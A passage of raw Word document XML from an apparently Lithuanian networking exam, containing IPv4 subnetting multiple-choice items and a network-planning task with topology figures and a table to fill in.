          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.255</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58387F85" w14:textId="4B67F08B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.32</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8103A9" w14:textId="6D83E154" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.31</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127624EB" w14:textId="776855BD" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.0</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5972F987" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADB85B0" w14:textId="784208F3" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00640F71" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>renginio IP adresas 88.150.77.41 / 28</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>. K</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>oks</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">privalo būti </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>potinklio IP adresas?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A47C04" w14:textId="210398A7" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.60</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B367F71" w14:textId="22040FBE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.44</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3F1A9" w14:textId="10DCB408" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.32</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AB18A" w14:textId="7DF35FBC" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>88.150.77.16</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719F079" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="092B16AC" w14:textId="030F7F21" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00683BC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKIRSTYMAS, TINKLO PLANAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55116740" w14:textId="21090FD6" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duotos tinklo topologijos Nr.</w:t>
      </w:r>
      <w:r w:rsidR="008F0B89" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 ir Nr.</w:t>
      </w:r>
      <w:r w:rsidR="008F0B89" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Egzistuoja tinklai A, B, C, D, E, F. Topologija Nr. 1 tinkluose D – 10, E – 20, F -30 vartotojų. Topologija Nr. 2 tinkluose D – 5, E – 35, F -65 vartotojų. Parinkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pateiktiems </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tinklams tinklo parametrus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B2E6E2" w14:textId="6B15498E" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nustatykite A klasės IP adresus t</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inklams A, B ir C</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>parinkdami racionaliausią tinklo kaukę.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45501D68" w14:textId="0073968C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nustatykite C klasės IP adresus t</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inklams D, E, F.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84E630" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8A6029" wp14:editId="2B3EFC41">
            <wp:extent cx="5124448" cy="2500439"/>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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5124448" cy="2500439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F9D3F" w14:textId="181E4092" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Tinklo topologija Nr. 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0639C" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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4FBA3CD3" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BC4CBC" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27767664" wp14:editId="630E481C">
            <wp:extent cx="5575384" cy="2665695"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5575384" cy="2665695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D89937" w14:textId="1CF94584" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Tinklo topologija Nr. 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407AD9C7" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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44017871" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07765607" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Užpildykite lenteles:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="6004"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5F88F9BE" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61CF0F40" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="722732A5" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="24E1D2A7" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="065B2857" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
